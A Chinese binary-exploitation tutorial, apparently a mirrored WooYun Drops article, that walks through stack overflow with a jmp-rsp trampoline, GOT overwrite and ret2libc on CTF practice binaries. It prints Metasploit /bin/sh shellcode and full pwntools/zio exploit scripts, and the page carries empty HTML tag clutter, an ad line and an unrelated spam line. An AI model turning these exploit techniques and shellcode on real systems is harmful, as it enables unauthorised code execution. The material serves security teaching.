<ruby id="bdb3f"></ruby>

    <p id="bdb3f"><cite id="bdb3f"></cite></p>

      <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
        <p id="bdb3f"><cite id="bdb3f"></cite></p>

          <pre id="bdb3f"></pre>
          <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

          <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
          <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

          <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                <ruby id="bdb3f"></ruby>

                企業??AI智能體構建引擎,智能編排和調試,一鍵部署,支持知識庫和私有化部署方案 廣告
                ## 0x02 常見漏洞利用技術 ### 2.1 利用跳板覆蓋返回地址 #### 2.1.1 使用范圍 當系統打開ASLR(基本都打開了)時,使用硬編碼地址的話,就無法成功利用漏洞.在這種情況下就可以使用這種技術.程序必須關閉NX #### 2.1.2 原理 當函數執行完,彈出了返回地址,rsp往往指向(返回地址+8),我們將shellcode放在此處就可以讓程序執行,注意跳板不一定是rsp #### 2.1.3 實踐 在這兒用的程序是來自重慶郵電大學舉辦的cctf2015中pwn的第一題,感謝tracy_子鵬學長(程序見附件),運行環境64位linux。 1 拿到程序第一件事就是先運行一下,熟悉要分析的東西(這一點不光是pwn,不管是re還是滲透,先對于目標有個直觀了解都是很重要的事) ![enter image description here](http://drops.wooyun.org/wp-content/uploads/2015/06/image0015.png) 程序很簡單,就是一個簡單的接受輸入 2 打開ida,,可以看到程序非常的簡單 ~~~ int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rdx@1 char v5; // [sp+0h] [bp-1020h]@1 char v6; // [sp+1000h] [bp-20h]@1 int v7; // [sp+101Ch] [bp-4h]@1 setbuf(stdin, 0LL, envp); setbuf(stdout, 0LL, v3); puts(0x4938E4LL); v7 = read(0LL, &v5, 4096LL); return memcpy(&v6, &v5, v7); } ~~~ 我們輸入的數據最終會復制到[bp-20h],而且沒有長度限制,肯定就是有棧溢出漏洞 3 接下來我們檢查一下程序打開了哪些保護措施 ![enter image description here](http://drops.wooyun.org/wp-content/uploads/2015/06/image002.png) ~~~ gdb pwn1 checksec ~~~ 可以看到程序沒有沒有打開任何保護措施,現在唯一需要解決的就是系統自帶的ASLR,(注意,使用gdb調試時,每次看到的棧地址可能是不變的,這并不代表系統沒有打開ASLR,gdb調試時會自動關閉ASLR) 4 接下來是定位返回地址 前面看到了我們輸入的數據最終會復制到[bp-20h],我們先嘗試輸入40個數據,用python生成40個數據 ![enter image description here](http://drops.wooyun.org/wp-content/uploads/2015/06/image0034.png) ~~~ gdb pwn1 r //運行程序 ~~~ 復制生成的輸入進去 ![enter image description here](http://drops.wooyun.org/wp-content/uploads/2015/06/image004.png) 看到棧上沒有成功覆蓋發揮地址 ![enter image description here](http://drops.wooyun.org/wp-content/uploads/2015/06/image0055.png) 再次使用八十字節 ![enter image description here](http://drops.wooyun.org/wp-content/uploads/2015/06/image006.png) 可以看出從第四十個字節開始的八個字節就會覆蓋返回地址 5 寫exp 首先我們需要一個shellcode,這可以通過msf生成 生成命令如下 ~~~ show payload use linux/x64/exec set cmd /bin/sh generate -t py -b "/x00" ~~~ 即可得到shellcode ~~~ # linux/x64/exec - 87 bytes # http://www.metasploit.com # Encoder: x64/xor # VERBOSE=false, PrependFork=false, PrependSetresuid=false, # PrependSetreuid=false, PrependSetuid=false, # PrependSetresgid=false, PrependSetregid=false, # PrependSetgid=false, PrependChrootBreak=false, # AppendExit=false, CMD=/bin/sh buf = "" buf += "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05" buf += "\xef\xff\xff\xff\x48\xbb\xab\xb5\xd9\xba\x45\x0a\xfd" buf += "\x44\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4" buf += "\xc1\x8e\x81\x23\x0d\xb1\xd2\x26\xc2\xdb\xf6\xc9\x2d" buf += "\x0a\xae\x0c\x22\x52\xb1\x97\x26\x0a\xfd\x0c\x22\x53" buf += "\x8b\x52\x4d\x0a\xfd\x44\x84\xd7\xb0\xd4\x6a\x79\x95" buf += "\x44\xfd\xe2\x91\x33\xa3\x05\xf8\x44" ~~~ 然后我們還需要一個跳板作為返回地址 peda就有這種功能 ~~~ jmpcall rsp ~~~ ![enter image description here](http://drops.wooyun.org/wp-content/uploads/2015/06/image0073.png) 我們就采用第一個地址, 注意64位系統,和little endian 然后我們使用zio寫exp ~~~ from zio import * io = zio('./pwn1') # io = zio(('127.0.0.1', 1234)) io.read_until('overflow!') pad = 'a' * 40 # 0x 43 68 7d : call rsp jmpAddr = '\x7d\x68\x43\x00\x00\x00\x00\x00' shellcode = "" shellcode += "\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d\x05" shellcode += "\xef\xff\xff\xff\x48\xbb\xab\xb5\xd9\xba\x45\x0a\xfd" shellcode += "\x44\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4" shellcode += "\xc1\x8e\x81\x23\x0d\xb1\xd2\x26\xc2\xdb\xf6\xc9\x2d" shellcode += "\x0a\xae\x0c\x22\x52\xb1\x97\x26\x0a\xfd\x0c\x22\x53" shellcode += "\x8b\x52\x4d\x0a\xfd\x44\x84\xd7\xb0\xd4\x6a\x79\x95" shellcode += "\x44\xfd\xe2\x91\x33\xa3\x05\xf8\x44" io.write(pad + jmpAddr + shellcode) io.interact() ~~~ `python pwn1.py`運行即可看到 已拿到shell ![enter image description here](http://drops.wooyun.org/wp-content/uploads/2015/06/image008.png) ### 2.2 GOT覆寫 #### 2.2.1 使用范圍 剛才我們是通過棧溢出漏洞攻擊函數的返回地址,但是現在對于棧溢出,已經有很多保護,例如canary(與windows下的GS技術類似).同時現在更常見的是指針覆蓋漏洞,在這種情況下我們擁有一次修改任意內存的機會,在這時我們采用的往往就是GOT覆寫技術. #### 2.2.2 原理 GOT是全局偏移表,類似于windows中PE結構的IAT,只不過windows中IAT中的函數地址是寫保護的,沒辦法利用,但是GOT是可寫的,我們可以將其中的函數地址覆蓋為我們的shellcode地址,在程序后面調用這個函數時就會調用我們的shellcode了 #### 2.2.3 實踐 在這兒我用的實驗程序來自panable.kr中的passcode,比較簡單,源碼如下 ~~~ #include <stdio.h> #include <stdlib.h> void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); scanf("%d", passcode1); fflush(stdin); // ha! mommy told me that 32bit is vulnerable to bruteforcing :) printf("enter passcode2 : "); scanf("%d", passcode2); printf("checking...\n"); if(passcode1==338150 && passcode2==13371337){ printf("Login OK!\n"); system("/bin/cat flag"); } else{ printf("Login Failed!\n"); exit(0); } } void welcome(){ char name[100]; printf("enter you name : "); scanf("%100s", name); printf("Welcome %s!\n", name); } int main(){ printf("Toddler's Secure Login System 1.0 beta.\n"); welcome(); login(); // something after login... printf("Now I can safely trust you that you have credential :)\n"); return 0; } ~~~ 編譯后的程序見附件,32位 linux 感覺銳銳_z的指點 1 分析程序可知,scanf時,沒有用取地址符,會使用棧上的數據作為指針存放輸入的數據,而我們第一次輸入的數據就是在棧上,簡單調試可知,在welcome()函數中的name的最后4字節會在login()函數中被用作地址指針 2 這樣,我們就獲得了修改任意地址數據的一次機會 3 分析程序可知如果我們用后面調用system()的地址覆蓋了printf()在GOT中的指針,那么在第二次login()中第二次調用printf()時就會直接去調用system() 4 現在我們需要知道兩個東西,一是GOT中printf()的地址,二是程序中調用system()的地址 ~~~ objdump -R passcode ~~~ ![enter image description here](http://drops.wooyun.org/wp-content/uploads/2015/06/image0093.png) 即可獲得`printf()`在的地址`0804a000`這是攻擊目標, 然后打開gdb,運行到調用system()的地方,為什么我們可以直接使用這個地址呢,因為linux下面的程序默認沒有隨機化code段, ![enter image description here](http://drops.wooyun.org/wp-content/uploads/2015/06/image010.png) 要寫入的值即為?`0x080485e3` 5 最后得到 ~~~ python -c "print('a'*96+'\x00\xa0\x04\x08'+'\n'+'134514147\n')" | ./passcode ~~~ `134514147`即為`0x080485e3` ![enter image description here](http://drops.wooyun.org/wp-content/uploads/2015/06/image0113.png) 成功改變了程序流程,讀出flag文件的內容,注意這里需要你新建一個名叫flag的文件 ### 2.3 ret2libc技術 #### 2.3.1 使用范圍 當系統打開DEP時,我們不能自己直接在棧上放shellcode,就使用幾乎每個linux系統都會自帶的libc中的代碼. #### 2.3.2 原理 一種常見的利用方式是用libc中的system()的地址覆蓋返回地址,同時在棧上布置好的參數,程序返回時就會產生一個shell #### 2.3.3 實踐 在這兒用的程序是強網杯的urldecoder(程序見附件),再次感謝tracy_子鵬學長指點 這道題同時開了ASLR和DEP.,運行環境為32位linux 1. 分析程序后發現,前面讀入數據時,只有遇到換行和EOF才會結束,但是后面檢查字符串長度是用的strlen,于是可以通過在字符串中加入\x00來繞過長度檢查 2. 繼續分析程序流程,發現,當輸入為%1\x00時就可以成功覆蓋返回地址 3. 接下來就考慮利用漏洞的方法 4. 觀察到溢出后,程序會多輸出一些棧上的數據出來,想到可以利用輸出出來的一些數據定位libc加載的基址,然后將返回地址覆蓋為前面讀入數據的代碼地址,再讀一次數據,再溢出一次,這一次執行到返回時,就執行libc中的system函數 5. 題目提供了libc,可以計算其中各函數的偏移,找到libc中system函數和/bin/sh字符串的地址,同時在棧上布置好參數,即可成功利用 下面附上exp及解釋 ~~~ from pwn import * from zio import * context(arch = 'i386', os = 'linux') #注意此處ELF()的用處是后面計算偏移,你運行程序時還是用的當前系統的libc #libc = ELF('./libc.so.6.i386') libc = ELF('/lib/i386-linux-gnu/i686/cmov/libc.so.6') #p = remote('119.254.101.197', 10001) p = process('./urldecoder') #第一次輸入,獲取libc中的地址信息 ret_addr = '\x90\x85\x04\x08' payload = "http://baidu.com//%1" + "\x00" + "a"*137 + ret_addr p.recvuntil("URL:") p.send(payload + '\n') data = p.recvuntil("URL:") base_addr = data[196:200] printf_addr = l32(base_addr) - 0x117474 offset = libc.symbols['printf'] - libc.symbols['system'] system_addr = printf_addr - offset binsh_offset = next(libc.search('/bin/sh')) - libc.symbols['printf'] binsh_addr = binsh_offset + printf_addr #第二次輸入 ret_addr = '\x12\x12\x12\x12' payload = "http://baidu.com//%1" + "\x00" + "a"*137 + l32(system_addr) + ret_addr + l32(binsh_addr) p.send(payload + '\n') p.interactive() ~~~ run `python url.py` 成功利用 ![enter image description here](http://drops.wooyun.org/wp-content/uploads/2015/06/image012.png) 從中也可以看到,對于同時開了ASLR和DEP的程序,利用的難度確實高了不少。
                  <ruby id="bdb3f"></ruby>

                  <p id="bdb3f"><cite id="bdb3f"></cite></p>

                    <p id="bdb3f"><cite id="bdb3f"><th id="bdb3f"></th></cite></p><p id="bdb3f"></p>
                      <p id="bdb3f"><cite id="bdb3f"></cite></p>

                        <pre id="bdb3f"></pre>
                        <pre id="bdb3f"><del id="bdb3f"><thead id="bdb3f"></thead></del></pre>

                        <ruby id="bdb3f"><mark id="bdb3f"></mark></ruby><ruby id="bdb3f"></ruby>
                        <pre id="bdb3f"><pre id="bdb3f"><mark id="bdb3f"></mark></pre></pre><output id="bdb3f"></output><p id="bdb3f"></p><p id="bdb3f"></p>

                        <pre id="bdb3f"><del id="bdb3f"><progress id="bdb3f"></progress></del></pre>

                              <ruby id="bdb3f"></ruby>

                              哎呀哎呀视频在线观看